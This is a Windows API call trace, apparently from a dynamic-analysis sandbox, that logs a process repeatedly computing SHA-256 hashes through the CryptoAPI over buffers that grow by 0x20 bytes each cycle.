	[0199.523] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.523] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.523] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0199.523] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690bf0
	[0199.523] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690bf0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690bf0, pdwDataLen=0x1283b0) returned 1
	[0199.523] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.523] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.523] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.523] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.523] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0199.523] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690c18
	[0199.523] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690c18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690c18, pdwDataLen=0x1283b0) returned 1
	[0199.524] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.524] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.524] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.524] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.524] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0199.524] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690c40
	[0199.524] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690c40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690c40, pdwDataLen=0x1283b0) returned 1
	[0199.524] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.524] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.524] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.525] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.525] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0199.525] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690c68
	[0199.525] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690c68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690c68, pdwDataLen=0x1283b0) returned 1
	[0199.525] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.525] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.525] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.525] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.525] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0199.525] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690c90
	[0199.525] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690c90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690c90, pdwDataLen=0x1283b0) returned 1
	[0199.525] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.525] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.525] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.526] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.526] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0199.526] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690cb8
	[0199.526] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690cb8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690cb8, pdwDataLen=0x1283b0) returned 1
	[0199.526] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.526] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.526] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.526] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.526] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0199.526] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690ce0
	[0199.526] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690ce0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690ce0, pdwDataLen=0x1283b0) returned 1
	[0199.526] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.526] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.526] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.527] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.527] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0199.527] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690d08
	[0199.527] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690d08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690d08, pdwDataLen=0x1283b0) returned 1
	[0199.527] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.527] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.527] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.527] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.527] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0199.527] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690d30
	[0199.527] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690d30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690d30, pdwDataLen=0x1283b0) returned 1
	[0199.527] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.527] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.527] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.528] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.528] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0199.528] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690d58
	[0199.528] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690d58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690d58, pdwDataLen=0x1283b0) returned 1
	[0199.528] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.528] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.528] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.528] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.528] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0199.528] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690d80
	[0199.528] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690d80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690d80, pdwDataLen=0x1283b0) returned 1
	[0199.528] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.528] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.528] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.529] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.529] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0199.529] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690da8
	[0199.529] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690da8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690da8, pdwDataLen=0x1283b0) returned 1
	[0199.529] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.529] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.529] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.529] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.529] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0199.529] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690dd0
	[0199.529] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690dd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690dd0, pdwDataLen=0x1283b0) returned 1
	[0199.529] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.529] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.529] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.530] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.530] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0199.530] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690df8
	[0199.530] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690df8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690df8, pdwDataLen=0x1283b0) returned 1
	[0199.530] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.530] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.530] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.530] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.530] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0199.530] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690e20
	[0199.530] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690e20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690e20, pdwDataLen=0x1283b0) returned 1
	[0199.530] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.530] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.530] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.531] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.531] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0199.531] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690e48
	[0199.531] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690e48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690e48, pdwDataLen=0x1283b0) returned 1
	[0199.531] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.531] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.531] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.531] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.531] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0199.531] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690e70
	[0199.531] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690e70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690e70, pdwDataLen=0x1283b0) returned 1
	[0199.531] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.531] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.531] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.532] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.532] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0199.532] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690e98
	[0199.532] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690e98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690e98, pdwDataLen=0x1283b0) returned 1
	[0199.532] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.532] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.532] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.532] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.532] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0199.532] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690ec0
	[0199.532] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690ec0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690ec0, pdwDataLen=0x1283b0) returned 1
	[0199.532] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.532] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.532] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.533] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.533] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0199.533] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690ee8
	[0199.533] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690ee8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690ee8, pdwDataLen=0x1283b0) returned 1
	[0199.533] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.533] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.533] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.533] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.533] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0199.533] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690f10
	[0199.533] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690f10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690f10, pdwDataLen=0x1283b0) returned 1
	[0199.533] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.533] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.533] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.534] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.534] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0199.534] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.534] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690f38
	[0199.534] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690f38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690f38, pdwDataLen=0x1283b0) returned 1
	[0199.534] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.534] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.534] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.534] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.534] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0199.534] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.534] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690f60
	[0199.534] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690f60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690f60, pdwDataLen=0x1283b0) returned 1
	[0199.534] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.534] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.534] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.535] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.535] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0199.535] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.535] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690f88
	[0199.535] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690f88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690f88, pdwDataLen=0x1283b0) returned 1
	[0199.535] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.535] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.535] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.535] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.535] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0199.535] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.535] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690fb0
	[0199.535] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690fb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690fb0, pdwDataLen=0x1283b0) returned 1
	[0199.535] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.535] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
